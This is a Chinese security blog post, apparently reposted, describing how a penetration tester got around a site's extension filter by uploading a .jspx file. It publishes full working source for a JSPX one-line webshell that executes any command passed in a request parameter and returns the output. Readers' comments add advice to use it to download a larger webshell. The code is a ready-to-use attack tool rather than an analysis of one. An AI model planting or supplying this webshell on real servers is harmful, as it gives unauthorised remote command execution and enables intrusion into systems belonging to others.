正在阅读:

上传JSPX文件绕过网站后缀名检查

12,593

这几天在做渗透测试的时候,发现一个有趣的东西。目标有上传漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上传文件,也不解析。后来只能放弃…

今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。 qingshen大牛,直接把配置的截图发过来,瞅了下,果然是类似iis解析cer、asa这类文件,作为一个jsp的映射。后来去网上找有没有 jspx的马,结果是没有找到的说,后来无才大牛丢了一个过来,上传,解析,搞定目标。呱呱…

jspx后缀

下面共享一个jspx的一句话木马,详见代码:

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
    <jsp:directive.page import="java.io.*"/>

    <html>
        <head>
            <title>jspx</title>
        </head>
        <body>
            <jsp:scriptlet>
               try {
		String cmd = request.getParameter("paxmac");
		if (cmd !=null){
			Process child = Runtime.getRuntime().exec(cmd);
			InputStream in = child.getInputStream();
			int c;
			while ((c = in.read()) != -1) {
			out.print((char)c);
			}
			in.close();
			try {
			child.waitFor();
			} catch (InterruptedException e) {
			e.printStackTrace();
		}
		}
		} catch (IOException e) {
		System.err.println(e);
		}
            </jsp:scriptlet>
        </body>
    </html>
</jsp:root>

原文转载自:http://blog.paxmac.org/?p=431

目前有:2条访客评论,博主回复2

  1. owo
    2016-04-28 08:33

    这个下载链接被你本站防火墙防死了。

  2. seabird
    2017-11-29 02:55

    大神,这个小马传上去后有啥用,貌似菜刀不能连,能通过这个小马上传后继续操作直到菜刀连接成功吗?

    • 独自等待
      2017-12-04 14:12

      这个是一个命令执行的马,用来绕过某些jsp后缀的,你可以通过此马远程下载个大马而绕过限制。

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌